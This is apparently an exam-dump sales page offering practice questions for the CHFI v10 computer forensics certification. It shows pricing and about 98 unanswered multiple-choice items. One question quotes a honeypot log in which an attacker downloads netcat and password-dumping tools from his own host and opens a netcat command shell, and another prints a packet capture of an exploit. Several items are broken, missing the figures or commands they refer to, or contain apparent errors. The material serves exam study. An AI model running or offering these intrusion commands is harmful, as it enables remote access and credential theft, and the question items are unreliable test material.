Weekend Sale Limited Time 60% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 2493360325

Good News !!! 312-49v10 Computer Hacking Forensic Investigator (CHFI-v10) is now Stable and With Pass Result

312-49v10 Practice Exam Questions and Answers

Computer Hacking Forensic Investigator (CHFI-v10)

Last Update 1 day ago
Total Questions : 704

Computer Hacking Forensic Investigator (CHFI-v10) is stable now with all latest exam questions are added 1 day ago. Incorporating 312-49v10 practice exam questions into your study plan is more than just a preparation strategy.

By familiarizing yourself with the Computer Hacking Forensic Investigator (CHFI-v10) exam format, identifying knowledge gaps, applying theoretical knowledge in ECCouncil practical scenarios, you are setting yourself up for success. 312-49v10 exam dumps provide a realistic preview, helping you to adapt your preparation strategy accordingly.

312-49v10 exam questions often include scenarios and problem-solving exercises that mirror real-world challenges. Working through 312-49v10 dumps allows you to practice pacing yourself, ensuring that you can complete all Computer Hacking Forensic Investigator (CHFI-v10) exam questions within the allotted time frame without sacrificing accuracy.

312-49v10 PDF

312-49v10 PDF (Printable)
$48
$119.99

312-49v10 Testing Engine

312-49v10 PDF (Printable)
$56
$139.99

312-49v10 PDF + Testing Engine

312-49v10 PDF (Printable)
$70.8
$176.99
Question # 1

Which among the following U.S. laws requires financial institutions—companies that offer consumers financial products or services such as loans, financial or investment advice, or insurance—to protect their customers’ information against security threats?

Options:

A.  

SOX

B.  

HIPAA

C.  

GLBA

D.  

FISMA

Discussion 0
Question # 2

Which of the following protocols allows non-ASCII files, such as video, graphics, and audio, to be sent through the email messages?

Options:

A.  

MIME

B.  

BINHEX

C.  

UT-16

D.  

UUCODE

Discussion 0
Question # 3

Which of the following tools is not a data acquisition hardware tool?

Options:

A.  

UltraKit

B.  

Atola Insight Forensic

C.  

F-Response Imager

D.  

Triage-Responder

Discussion 0
Question # 4

Which of the following reports are delivered under oath to a board of directors/managers/panel of the jury?

Options:

A.  

Written Formal Report

B.  

Verbal Formal Report

C.  

Verbal Informal Report

D.  

Written Informal Report

Discussion 0
Question # 5

In handling computer-related incidents, which IT role should be responsible for recovery, containment, and prevention to constituents?

Options:

A.  

Security Administrator

B.  

Network Administrator

C.  

Director of Information Technology

D.  

Director of Administration

Discussion 0
Question # 6

How many possible sequence number combinations are there in TCP/IP protocol?

Options:

A.  

1 billion

B.  

320 billion

C.  

4 billion

D.  

32 million

Discussion 0
Question # 7

Which of the following tasks DOES NOT come under the investigation phase of a cybercrime forensics investigation case?

Options:

A.  

Data collection

B.  

Secure the evidence

C.  

First response

D.  

Data analysis

Discussion 0
Question # 8

What is the first step taken in an investigation for laboratory forensic staff members?

Options:

A.  

Packaging the electronic evidence

B.  

Securing and evaluating the electronic crime scene

C.  

Conducting preliminary interviews

D.  

Transporting the electronic evidence

Discussion 0
Question # 9

What type of analysis helps to identify the time and sequence of events in an investigation?

Options:

A.  

Time-based

B.  

Functional

C.  

Relational

D.  

Temporal

Discussion 0
Question # 10

Where does Encase search to recover NTFS files and folders?

Options:

A.  

MBR

B.  

MFT

C.  

Slack space

D.  

HAL

Discussion 0
Question # 11

Stephen is checking an image using Compare Files by The Wizard, and he sees the file signature is shown as FF D8 FF E1. What is the file type of the image?

Options:

A.  

gif

B.  

bmp

C.  

jpeg

D.  

png

Discussion 0
Question # 12

Davidson Trucking is a small transportation company that has three local offices in Detroit Michigan. Ten female employees that work for the company have gone to an attorney reporting that male employees repeatedly harassed them and that management did nothing to stop the problem. Davidson has employee policies that outline all company guidelines, including awareness on harassment and how it will not be tolerated. When the case is brought to court, whom should the prosecuting attorney call upon for not upholding company policy?

Options:

A.  

IT personnel

B.  

Employees themselves

C.  

Supervisors

D.  

Administrative assistant in charge of writing policies

Discussion 0
Question # 13

Wireless access control attacks aim to penetrate a network by evading WLAN access control measures such as AP MAC filters and Wi-Fi port access controls. Which of the following wireless access control attacks allow the attacker to set up a rogue access point outside the corporate perimeter and then lure the employees of the organization to connect to it?

Options:

A.  

Ad hoc associations

B.  

Client mis-association

C.  

MAC spoofing

D.  

Rogue access points

Discussion 0
Question # 14

Ivanovich, a forensics investigator, is trying to extract complete information about running processes from a system. Where should he look apart from the RAM and virtual memory?

Options:

A.  

Swap space

B.  

Application data

C.  

Files and documents

D.  

Slack space

Discussion 0
Question # 15

What type of attack sends spoofed UDP packets (instead of ping packets) with a fake source address to the IP broadcast address of a large network?

Options:

A.  

Fraggle

B.  

Smurf scan

C.  

SYN flood

D.  

Teardrop

Discussion 0
Question # 16

Jason discovered a file named $RIYG6VR.doc in the C:\$Recycle.Bin\\ while analyzing a hard disk image for the deleted data. What inferences can he make from the file name?

Options:

A.  

It is a doc file deleted in seventh sequential order

B.  

RIYG6VR.doc is the name of the doc file deleted from the system

C.  

It is file deleted from R drive

D.  

It is a deleted doc file

Discussion 0
Question # 17

Why is it still possible to recover files that have been emptied from the Recycle Bin on a Windows computer?

Options:

A.  

The data is still present until the original location of the file is used

B.  

The data is moved to the Restore directory and is kept there indefinitely

C.  

The data will reside in the L2 cache on a Windows computer until it is manually deleted

D.  

It is not possible to recover data that has been emptied from the Recycle Bin

Discussion 0
Question # 18

Julie is a college student majoring in Information Systems and Computer Science. She is currently writing an essay for her computer crimes class. Julie paper focuses on white-collar crimes in America and how forensics investigators investigate the cases. Julie would like to focus the subject. Julie would like to focus the subject of the essay on the most common type of crime found in corporate America. What crime should Julie focus on?

Options:

A.  

Physical theft

B.  

Copyright infringement

C.  

Industrial espionage

D.  

Denial of Service attacks

Discussion 0
Question # 19

Which of the following is an iOS Jailbreaking tool?

Options:

A.  

Kingo Android ROOT

B.  

Towelroot

C.  

One Click Root

D.  

Redsn0w

Discussion 0
Question # 20

While presenting his case to the court, Simon calls many witnesses to the stand to testify. Simon decides to call Hillary Taft, a lay witness, to the stand. Since Hillary is a lay witness, what field would she be considered an expert in?

Options:

A.  

Technical material related to forensics

B.  

No particular field

C.  

Judging the character of defendants/victims

D.  

Legal issues

Discussion 0
Question # 21

Where is the default location for Apache access logs on a Linux computer?

Options:

A.  

usr/local/apache/logs/access_log

B.  

bin/local/home/apache/logs/access_log

C.  

usr/logs/access_log

D.  

logs/usr/apache/access_log

Discussion 0
Question # 22

Using Linux to carry out a forensics investigation, what would the following command accomplish?

dd if=/usr/home/partition.image of=/dev/sdb2 bs=4096 conv=notrunc,noerror

Options:

A.  

Search for disk errors within an image file

B.  

Backup a disk to an image file

C.  

Copy a partition to an image file

D.  

Restore a disk from an image file

Discussion 0
Question # 23

Tyler is setting up a wireless network for his business that he runs out of his home. He has followed all the directions from the ISP as well as the wireless router manual. He does not have any encryption set and the SSID is being broadcast. On his laptop, he can pick up the wireless signal for short periods of time, but then the connection drops and the signal goes away.

Eventually the wireless signal shows back up, but drops intermittently. What could be Tyler issue with his home wireless network?

Options:

A.  

Computers on his wired network

B.  

Satellite television

C.  

2.4Ghz Cordless phones

D.  

CB radio

Discussion 0
Question # 24

In the following directory listing,

Question # 24

Which file should be used to restore archived email messages for someone using Microsoft Outlook?

Options:

A.  

Outlook bak

B.  

Outlook ost

C.  

Outlook NK2

D.  

Outlook pst

Discussion 0
Question # 25

Which file is a sequence of bytes organized into blocks understandable by the system’s linker?

Options:

A.  

executable file

B.  

source file

C.  

Object file

D.  

None of these

Discussion 0
Question # 26

What stage of the incident handling process involves reporting events?

Options:

A.  

Containment

B.  

Follow-up

C.  

Identification

D.  

Recovery

Discussion 0
Question # 27

Which among the following is an act passed by the U.S. Congress in 2002 to protect investors from the possibility of fraudulent accounting activities by corporations?

Options:

A.  

HIPAA

B.  

GLBA

C.  

SOX

D.  

FISMA

Discussion 0
Question # 28

A picture file is recovered from a computer under investigation. During the investigation process, the file is enlarged 500% to get a better view of its contents. The picture quality is not degraded at all from this process. What kind of picture is this file. What kind of picture is this file?

Options:

A.  

Raster image

B.  

Vector image

C.  

Metafile image

D.  

Catalog image

Discussion 0
Question # 29

Which of the following acts as a network intrusion detection system as well as network intrusion prevention system?

Options:

A.  

Accunetix

B.  

Nikto

C.  

Snort

D.  

Kismet

Discussion 0
Question # 30

You should make at least how many bit-stream copies of a suspect drive?

Options:

A.  

1

B.  

2

C.  

3

D.  

4

Discussion 0
Question # 31

Which of the following data structures stores attributes of a process, as well as pointers to other attributes and data structures?

Options:

A.  

Lsproc

B.  

DumpChk

C.  

RegEdit

D.  

EProcess

Discussion 0
Question # 32

What file structure database would you expect to find on floppy disks?

Options:

A.  

NTFS

B.  

FAT32

C.  

FAT16

D.  

FAT12

Discussion 0
Question # 33

Michael works for Kimball Construction Company as senior security analyst. As part of yearly security audit, Michael scans his network for vulnerabilities. Using Nmap, Michael conducts XMAS scan and most of the ports scanned do not give a response. In what state are these ports?

Options:

A.  

Closed

B.  

Open

C.  

Stealth

D.  

Filtered

Discussion 0
Question # 34

Volatile Memory is one of the leading problems for forensics. Worms such as code Red are memory resident and do write themselves to the hard drive, if you turn the system off they disappear. In a lab environment, which of the following options would you suggest as the most appropriate to overcome the problem of capturing volatile memory?

Options:

A.  

Use VMware to be able to capture the data in memory and examine it

B.  

Give the Operating System a minimal amount of memory, forcing it to use a swap file

C.  

Create a Separate partition of several hundred megabytes and place the swap file there

D.  

Use intrusion forensic techniques to study memory resident infections

Discussion 0
Question # 35

When examining a hard disk without a write-blocker, you should not start windows because Windows will write data to the:

Options:

A.  

Recycle Bin

B.  

MSDOS.sys

C.  

BIOS

D.  

Case files

Discussion 0
Question # 36

What TCP/UDP port does the toolkit program netstat use?

Options:

A.  

Port 7

B.  

Port 15

C.  

Port 23

D.  

Port 69

Discussion 0
Question # 37

After passively scanning the network of Department of Defense (DoD), you switch over to active scanning to identify live hosts on their network. DoD is a large organization and should respond to any number of scans. You start an ICMP ping sweep by sending an IP packet to the broadcast address. Only five hosts respond to your ICMP pings; definitely not the number of hosts you were expecting. Why did this ping sweep only produce a few responses?

Options:

A.  

Only IBM AS/400 will reply to this scan

B.  

Only Windows systems will reply to this scan

C.  

A switched network will not respond to packets sent to the broadcast address

D.  

Only Unix and Unix-like systems will reply to this scan

Discussion 0
Question # 38

With the standard Linux second extended file system (Ext2fs), a file is deleted when the inode internal link count reaches ________.

Options:

A.  

0

B.  

10

C.  

100

D.  

1

Discussion 0
Question # 39

During the course of a corporate investigation, you find that an Employee is committing a crime.

Can the Employer file a criminal complaint with Police?

Options:

A.  

Yes, and all evidence can be turned over to the police

B.  

Yes, but only if you turn the evidence over to a federal law enforcement agency

C.  

No, because the investigation was conducted without following standard police procedures

D.  

No, because the investigation was conducted without warrant

Discussion 0
Question # 40

An Employee is suspected of stealing proprietary information belonging to your company that he had no rights to possess. The information was stored on the Employees Computer that was protected with the NTFS Encrypted File System (EFS) and you had observed him copy the files to a floppy disk just before leaving work for the weekend. You detain the Employee before he leaves the building and recover the floppy disks and secure his computer. Will you be able to break the encryption so that you can verify that that the employee was in possession of the proprietary information?

Options:

A.  

EFS uses a 128-bit key that can't be cracked, so you will not be able to recover the information

B.  

When the encrypted file was copied to the floppy disk, it was automatically unencrypted, so you can recover the information.

C.  

The EFS Revoked Key Agent can be used on the Computer to recover the information

D.  

When the Encrypted file was copied to the floppy disk, the EFS private key was also copied to the floppy disk, so you can recover the information.

Discussion 0
Question # 41

Diskcopy is:

Options:

A.  

a utility by AccessData

B.  

a standard MS-DOS command

C.  

Digital Intelligence utility

D.  

dd copying tool

Discussion 0
Question # 42

What information do you need to recover when searching a victim’s computer for a crime committed with specific e-mail message?

Options:

A.  

Internet service provider information

B.  

E-mail header

C.  

Username and password

D.  

Firewall log

Discussion 0
Question # 43

You are working as Computer Forensics investigator and are called by the owner of an accounting firm to investigate possible computer abuse by one of the firm’s employees. You meet with the owner of the firm and discover that the company has never published a policy stating that they reserve the right to inspect their computing assets at will. What do you do?

Options:

A.  

Inform the owner that conducting an investigation without a policy is not a problem because the company is privately owned

B.  

Inform the owner that conducting an investigation without a policy is a violation of the 4th amendment

C.  

Inform the owner that conducting an investigation without a policy is a violation of the employee’s expectation of privacy

D.  

Inform the owner that conducting an investigation without a policy is not a problem because a policy is only necessary for government agencies

Discussion 0
Question # 44

When using Windows acquisitions tools to acquire digital evidence, it is important to use a well-tested hardware write-blocking device to:

Options:

A.  

Automate Collection from image files

B.  

Avoiding copying data from the boot partition

C.  

Acquire data from host-protected area on a disk

D.  

Prevent Contamination to the evidence drive

Discussion 0
Question # 45

Profiling is a forensics technique for analyzing evidence with the goal of identifying the perpetrator from their various activity. After a computer has been compromised by a hacker, which of the following would be most important in forming a profile of the incident?

Options:

A.  

The manufacturer of the system compromised

B.  

The logic, formatting and elegance of the code used in the attack

C.  

The nature of the attack

D.  

The vulnerability exploited in the incident

Discussion 0
Question # 46

One technique for hiding information is to change the file extension from the correct one to one that might not be noticed by an investigator. For example, changing a .jpg extension to a .doc extension so that a picture file appears to be a document. What can an investigator examine to verify that a file has the correct extension?

Options:

A.  

the File Allocation Table

B.  

the file header

C.  

the file footer

D.  

the sector map

Discussion 0
Question # 47

Harold is a security analyst who has just run the rdisk /s command to grab the backup SAM files on a computer. Where should Harold navigate on the computer to find the file?

Options:

A.  

%systemroot%\system32\LSA

B.  

%systemroot%\system32\drivers\etc

C.  

%systemroot%\repair

D.  

%systemroot%\LSA

Discussion 0
Question # 48

In General, __________________ Involves the investigation of data that can be retrieved from the hard disk or other disks of a computer by applying scientific methods to retrieve the data.

Options:

A.  

Network Forensics

B.  

Data Recovery

C.  

Disaster Recovery

D.  

Computer Forensics

Discussion 0
Question # 49

What is the target host IP in the following command?

Options:

A.  

172.16.28.95

B.  

10.10.150.1

C.  

Firewalk does not scan target hosts

D.  

This command is using FIN packets, which cannot scan target hosts

Discussion 0
Question # 50

E-mail logs contain which of the following information to help you in your investigation? (Choose four.)

Options:

A.  

user account that was used to send the account

B.  

attachments sent with the e-mail message

C.  

unique message identifier

D.  

contents of the e-mail message

E.  

date and time the message was sent

Discussion 0
Question # 51

On Linux/Unix based Web servers, what privilege should the daemon service be run under?

Options:

A.  

Guest

B.  

Root

C.  

You cannot determine what privilege runs the daemon service

D.  

Something other than root

Discussion 0
Question # 52

You are called in to assist the police in an investigation involving a suspected drug dealer. The suspects house was searched by the police after a warrant was obtained and they located a floppy disk in the suspects bedroom. The disk contains several files, but they appear to be password protected. What are two common methods used by password cracking software that you can use to obtain the password?

Options:

A.  

Limited force and library attack

B.  

Brute Force and dictionary Attack

C.  

Maximum force and thesaurus Attack

D.  

Minimum force and appendix Attack

Discussion 0
Question # 53

A honey pot deployed with the IP 172.16.1.108 was compromised by an attacker. Given below is an excerpt from a Snort binary capture of the attack. Decipher the activity carried out by the attacker by studying the log. Please note that you are required to infer only what is explicit in the excerpt.

(Note: The student is being tested on concepts learnt during passive OS fingerprinting, basic TCP/IP connection concepts and the ability to read packet signatures from a sniff dump.)

03/15-20:21:24.107053 211.185.125.124:3500 -> 172.16.1.108:111

TCP TTL:43 TOS:0x0 ID:29726 IpLen:20 DgmLen:52 DF

***A**** Seq: 0x9B6338C5 Ack: 0x5820ADD0 Win: 0x7D78 TcpLen: 32

TCP Options (3) => NOP NOP TS: 23678634 2878772

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

03/15-20:21:24.452051 211.185.125.124:789 -> 172.16.1.103:111

UDP TTL:43 TOS:0x0 ID:29733 IpLen:20 DgmLen:84

Len: 64

01 0A 8A 0A 00 00 00 00 00 00 00 02 00 01 86 A0 ................

00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00 ................

00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01 ................

00 00 00 11 00 00 00 00 ........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

03/15-20:21:24.730436 211.185.125.124:790 -> 172.16.1.103:32773

UDP TTL:43 TOS:0x0 ID:29781 IpLen:20 DgmLen:1104

Len: 1084

47 F7 9F 63 00 00 00 00 00 00 00 02 00 01 86 B8

Options:

A.  

The attacker has conducted a network sweep on port 111

B.  

The attacker has scanned and exploited the system using Buffer Overflow

C.  

The attacker has used a Trojan on port 32773

D.  

The attacker has installed a backdoor

Discussion 0
Question # 54

When investigating a network that uses DHCP to assign IP addresses, where would you look to determine which system (MAC address) had a specific IP address at a specific time?

Options:

A.  

on the individual computer's ARP cache

B.  

in the Web Server log files

C.  

in the DHCP Server log files

D.  

there is no way to determine the specific IP address

Discussion 0
Question # 55

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Short reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.

He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CM

D.  

EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.

"cmd1.exe /c open 213.116.251.162 >ftpcom"

"cmd1.exe /c echo johna2k >>ftpcom"

"cmd1.exe /c echo haxedj00 >>ftpcom"

"cmd1.exe /c echo get nc.exe >>ftpcom"

"cmd1.exe /c echo get pdump.exe >>ftpcom"

"cmd1.exe /c echo get samdump.dll >>ftpcom"

"cmd1.exe /c echo quit >>ftpcom"

"cmd1.exe /c ftp -s:ftpcom"

"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"

What can you infer from the exploit given?

Options:

A.  

It is a local exploit where the attacker logs in using username johna2k

B.  

There are two attackers on the system - johna2k and haxedj00

C.  

The attack is a remote exploit and the hacker downloads three files

D.  

The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Discussion 0
Question # 56

James is testing the ability of his routers to withstand DoS attacks. James sends ICMP ECHO requests to the broadcast address of his network. What type of DoS attack is James testing against his network?

Options:

A.  

Smurf

B.  

Trinoo

C.  

Fraggle

D.  

SYN flood

Discussion 0
Question # 57

You are working for a local police department that services a population of 1,000,000 people and you have been given the task of building a computer forensics lab. How many law-enforcement computer investigators should you request to staff the lab?

Options:

A.  

8

B.  

1

C.  

4

D.  

2

Discussion 0
Question # 58

______allows a forensic investigator to identify the missing links during investigation.

Options:

A.  

Evidence preservation

B.  

Chain of custody

C.  

Evidence reconstruction

D.  

Exhibit numbering

Discussion 0
Question # 59

Which of the following is a requirement for senders as per the CAN-SPAM act?

Options:

A.  

Senders cannot use misleading or false header information

B.  

Senders should never share their physical postal address in the email

C.  

Senders must use deceptive subject lines

D.  

Emails must not contain information regarding how to stop receiving emails from the sender in future

Discussion 0
Question # 60

An EC2 instance storing critical data of a company got infected with malware. The forensics team took the EBS volume snapshot of the affected Instance to perform further analysis and collected other data of evidentiary value. What should be their next step?

Options:

A.  

They should pause the running instance

B.  

They should keep the instance running as it stores critical data

C.  

They should terminate all instances connected via the same VPC

D.  

They should terminate the instance after taking necessary backup

Discussion 0
Question # 61

An investigator Is examining a file to identify any potentially malicious content. To avoid code execution and still be able to uncover hidden indicators of compromise (IOC), which type of examination should the investigator perform:

Options:

A.  

Threat hunting

B.  

Threat analysis

C.  

Static analysis

D.  

Dynamic analysis

Discussion 0
Question # 62

Jeff is a forensics investigator for a government agency's cyber security office. Jeff Is tasked with acquiring a memory dump of a Windows 10 computer that was involved In a DDoS attack on the government agency's web application. Jeff is onsite to collect the memory. What tool could Jeff use?

Options:

A.  

Volatility

B.  

Autopsy

C.  

RAM Mapper

D.  

Memcheck

Discussion 0
Question # 63

An investigator wants to extract passwords from SAM and System Files. Which tool can the Investigator use to obtain a list of users, passwords, and their hashes In this case?

Options:

A.  

PWdump7

B.  

HashKey

C.  

Nuix

D.  

FileMerlin

Discussion 0
Question # 64

Choose the layer in iOS architecture that provides frameworks for iOS app development?

Options:

A.  

Media services

B.  

Cocoa Touch

C.  

Core services

D.  

Core OS

Discussion 0
Question # 65

Harry has collected a suspicious executable file from an infected system and seeks to reverse its machine code to Instructions written in assembly language. Which tool should he use for this purpose?

Options:

A.  

Ollydbg

B.  

oledump

C.  

HashCalc

D.  

BinText

Discussion 0
Question # 66

Maria has executed a suspicious executable file In a controlled environment and wants to see if the file adds/modifies any registry value after execution via Windows Event Viewer. Which of the following event ID should she look for In this scenario?

Options:

A.  

Event ID 4657

B.  

Event ID 4624

C.  

Event ID 4688

D.  

Event ID 7040

Discussion 0
Question # 67

For the purpose of preserving the evidentiary chain of custody, which of the following labels is not appropriate?

Options:

A.  

Relevant circumstances surrounding the collection

B.  

General description of the evidence

C.  

Exact location the evidence was collected from

D.  

SSN of the person collecting the evidence

Discussion 0
Question # 68

In which loT attack does the attacker use multiple forged identities to create a strong illusion of traffic congestion, affecting communication between neighboring nodes and networks?

Options:

A.  

Replay attack

B.  

Jamming attack

C.  

Blueborne attack

D.  

Sybil attack

Discussion 0
Question # 69

Chloe is a forensic examiner who is currently cracking hashed passwords for a crucial mission and hopefully solve the case. She is using a lookup table used for recovering a plain text password from cipher text; it contains word list and brute-force list along with their computed hash values. Chloe Is also using a graphical generator that supports SHA1.

a. What password technique is being used?

b. What tool is Chloe using?

Options:

A.  

Dictionary attack b. Cisco PIX

B.  

Cain & Able b. Rten

C.  

Brute-force b. MScache

D.  

Rainbow Tables b. Winrtgen

Discussion 0
Question # 70

This law sets the rules for commercial email, establishes requirements for commercial messages, gives recipients the right to have you stop emailing them, and spells out tough penalties for violations.

Options:

A.  

The CAN-SPAM act

B.  

Federal Spam act

C.  

Telemarketing act

D.  

European Anti-Spam act

Discussion 0
Question # 71

To understand the impact of a malicious program after the booting process and to collect recent information from the disk partition, an Investigator should evaluate the content of the:

Options:

A.  

MBR

B.  

GRUB

C.  

UEFI

D.  

BIOS

Discussion 0
Question # 72

Adam Is thinking of establishing a hospital In the US and approaches John, a software developer to build a site and host it for him on one of the servers, which would be used to store patient health records. He has learned from his legal advisors that he needs to have the server's log data reviewed and managed according to certain standards and regulations. Which of the following regulations are the legal advisors referring to?

Options:

A.  

Data Protection Act of 2018

B.  

Payment Card Industry Data Security Standard (PCI DSS)

C.  

Electronic Communications Privacy Act

D.  

Health Insurance Portability and Accountability Act of 1996 (HIPAA)

Discussion 0
Question # 73

Which of the following statements is true with respect to SSDs (solid-state drives)?

Options:

A.  

Like HDDs. SSDs also have moving parts

B.  

SSDs cannot store non-volatile data

C.  

SSDs contain tracks, clusters, and sectors to store data

D.  

Faster data access, lower power usage, and higher reliability are some of the m

Discussion 0
Question # 74

An investigator needs to perform data acquisition from a storage media without altering its contents to maintain the Integrity of the content. The approach adopted by the Investigator relies upon the capacity of enabling read-only access to the storage media. Which tool should the Investigator Integrate Into his/her procedures to accomplish this task?

Options:

A.  

BitLocker

B.  

Data duplication tool

C.  

Backup tool

D.  

Write blocker

Discussion 0
Question # 75

A cybercriminal is attempting to remove evidence from a Windows computer. He deletes the file evldence1.doc. sending it to Windows Recycle Bin. The cybercriminal then empties the Recycle Bin. After having been removed from the Recycle Bin. what will happen to the data?

Options:

A.  

The data will remain in its original clusters until it is overwritten

B.  

The data will be moved to new clusters in unallocated space

C.  

The data will become corrupted, making it unrecoverable

D.  

The data will be overwritten with zeroes

Discussion 0
Question # 76

"No action taken by law enforcement agencies or their agents should change data held on a computer or storage media which may subsequently be relied upon in court" - this principle Is advocated by which of the following?

Options:

A.  

The Association of Chief Police Officers (ACPO) Principles of Digital Evidence

B.  

Locard's exchange principle

C.  

Scientific Working Group on Imaging Technology (SWGIT)

D.  

FBI Cyber Division

Discussion 0
Question # 77

Edgar is part of the FBI's forensic media and malware analysis team; he Is analyzing a current malware and Is conducting a thorough examination of the suspect system, network, and other connected devices. Edgar's approach Is to execute the malware code to know how It Interacts with the host system and Its Impacts on It. He is also using a virtual machine and a sandbox environment.

What type of malware analysis is Edgar performing?

Options:

A.  

Malware disassembly

B.  

VirusTotal analysis

C.  

Static analysis

D.  

Dynamic malware analysis/behavioral analysis

Discussion 0
Question # 78

Cloud forensic investigations impose challenges related to multi-jurisdiction and multi-tenancy aspects. To have a better understanding of the roles and responsibilities between the cloud service provider (CSP) and the client, which document should the forensic investigator review?

Options:

A.  

Service level agreement

B.  

Service level management

C.  

National and local regulation

D.  

Key performance indicator

Discussion 0
Question # 79

Which of the following is the most effective tool for acquiring volatile data from a Windows-based system?

Options:

A.  

Coreography

B.  

Datagrab

C.  

Ethereal

D.  

Helix

Discussion 0
Question # 80

An investigator seized a notebook device installed with a Microsoft Windows OS. Which type of files would support an investigation of the data size and structure in the device?

Options:

A.  

Ext2 and Ext4

B.  

APFSandHFS

C.  

HFS and GNUC

D.  

NTFSandFAT

Discussion 0
Question # 81

In Java, when multiple applications are launched, multiple Dalvik Virtual Machine instances occur that consume memory and time. To avoid that. Android Implements a process that enables low memory consumption and quick start-up time. What is the process called?

Options:

A.  

init

B.  

Media server

C.  

Zygote

D.  

Daemon

Discussion 0
Question # 82

James, a forensics specialist, was tasked with investigating a Windows XP machine that was used for malicious online activities. During the Investigation, he recovered certain deleted files from Recycle Bin to Identify attack clues.

Identify the location of Recycle Bin in Windows XP system.

Options:

A.  

Drive:\$Recycle.Bin\

B.  

Iocal/sha re/Trash

C.  

Drive:\RECYCLER\

D.  

DriveARECYCLED

Discussion 0
Question # 83

Place the following In order of volatility from most volatile to the least volatile.

Options:

A.  

Registers and cache, routing tables, temporary file systems, disk storage, archival media

B.  

Register and cache, temporary file systems, routing tables, disk storage, archival media

C.  

Registers and cache, routing tables, temporary file systems, archival media, disk storage

D.  

Archival media, temporary file systems, disk storage, archival media, register and cache

Discussion 0
Question # 84

The information security manager at a national legal firm has received several alerts from the intrusion detection system that a known attack signature was detected against the organization's file server. What should the information security manager do first?

Options:

A.  

Report the incident to senior management

B.  

Update the anti-virus definitions on the file server

C.  

Disconnect the file server from the network

D.  

Manually investigate to verify that an incident has occurred

Discussion 0
Question # 85

Smith, an employee of a reputed forensic investigation firm, has been hired by a private organization to investigate a laptop that is suspected to be involved in the hacking of the organization’s DC server. Smith wants to find all the values typed into the Run box in the Start menu. Which of the following registry keys will Smith check to find the above information?

Options:

A.  

TypedURLs key

B.  

MountedDevices key

C.  

UserAssist Key

D.  

RunMRU key

Discussion 0
Question # 86

Which ISO Standard enables laboratories to demonstrate that they comply with quality assurance and provide valid results?

Options:

A.  

ISO/IEC 16025

B.  

ISO/IEC 18025

C.  

ISO/IEC 19025

D.  

ISO/IEC 17025

Discussion 0
Question # 87

Which of the following examinations refers to the process of providing the opposing side in a trial the opportunity to question a witness?

Options:

A.  

Cross Examination

B.  

Direct Examination

C.  

Indirect Examination

D.  

Witness Examination

Discussion 0
Question # 88

An investigator has found certain details after analysis of a mobile device. What can reveal the manufacturer information?

Options:

A.  

Equipment Identity Register (EIR)

B.  

Electronic Serial Number (ESN)

C.  

International mobile subscriber identity (IMSI)

D.  

Integrated circuit card identifier (ICCID)

Discussion 0
Question # 89

UEFI is a specification that defines a software interface between an OS and platform firmware. Where does this interface store information about files present on a disk?

Options:

A.  

BIOS-MBR

B.  

GUID Partition Table (GPT)

C.  

Master Boot Record (MBR)

D.  

BIOS Parameter Block

Discussion 0
Question # 90

Consider that you are investigating a machine running an Windows OS released prior to Windows Vista. You are trying to gather information about the deleted files by examining the master database file named INFO2 located at C:\Recycler\\. You read an entry named "Dd5.exe". What does Dd5.exe mean?

Options:

A.  

D drive. fifth file deleted, a .exe file

B.  

D drive, fourth file restored, a .exe file

C.  

D drive, fourth file deleted, a .exe file

D.  

D drive, sixth file deleted, a .exe file

Discussion 0
Question # 91

Jim’s company regularly performs backups of their critical servers. But the company can’t afford to send backup tapes to an off-site vendor for long term storage and archiving. Instead Jim’s company keeps the backup tapes in a safe in the office. Jim’s company is audited each year, and the results from this year’s audit show a risk because backup tapes aren’t stored off-site. The Manager of Information Technology has a plan to take the backup tapes home with him and wants to know what two things he can do to secure the backup tapes while in transit?

Options:

A.  

Encrypt the backup tapes and use a courier to transport them.

B.  

Encrypt the backup tapes and transport them in a lock box

C.  

Degauss the backup tapes and transport them in a lock box.

D.  

Hash the backup tapes and transport them in a lock box.

Discussion 0
Question # 92

An investigator is analyzing a checkpoint firewall log and comes across symbols. What type of log is he looking at?

Question # 92

Options:

A.  

Security event was monitored but not stopped

B.  

Malicious URL detected

C.  

An email marked as potential spam

D.  

Connection rejected

Discussion 0
Question # 93

Which list contains the most recent actions performed by a Windows User?

Options:

A.  

MRU

B.  

Activity

C.  

Recents

D.  

Windows Error Log

Discussion 0
Question # 94

Which among the following search warrants allows the first responder to search and seize the victim’s computer components such as hardware, software, storage devices, and documentation?

Options:

A.  

John Doe Search Warrant

B.  

Citizen Informant Search Warrant

C.  

Electronic Storage Device Search Warrant

D.  

Service Provider Search Warrant

Discussion 0
Question # 95

Adam, a forensic analyst, is preparing VMs for analyzing a malware. Which of the following is NOT a best practice?

Options:

A.  

Isolating the host device

B.  

Installing malware analysis tools

C.  

Using network simulation tools

D.  

Enabling shared folders

Discussion 0
Question # 96

> NMAP -sn 192.168.11.200-215 The NMAP command above performs which of the following?

Options:

A.  

A trace sweep

B.  

A port scan

C.  

A ping scan

D.  

An operating system detect

Discussion 0
Question # 97

What do you call the process in which an attacker uses magnetic field over the digital media device to delete any previously stored data?

Options:

A.  

Disk deletion

B.  

Disk cleaning

C.  

Disk degaussing

D.  

Disk magnetization

Discussion 0
Question # 98

You need to deploy a new web-based software package for your organization. The package requires three separate servers and needs to be available on the Internet. What is the recommended architecture in terms of server placement?

Options:

A.  

All three servers need to be placed internally

B.  

A web server and the database server facing the Internet, an application server on the internal network

C.  

A web server facing the Internet, an application server on the internal network, a database server on the internal network

D.  

All three servers need to face the Internet so that they can communicate between themselves

Discussion 0
Question # 99

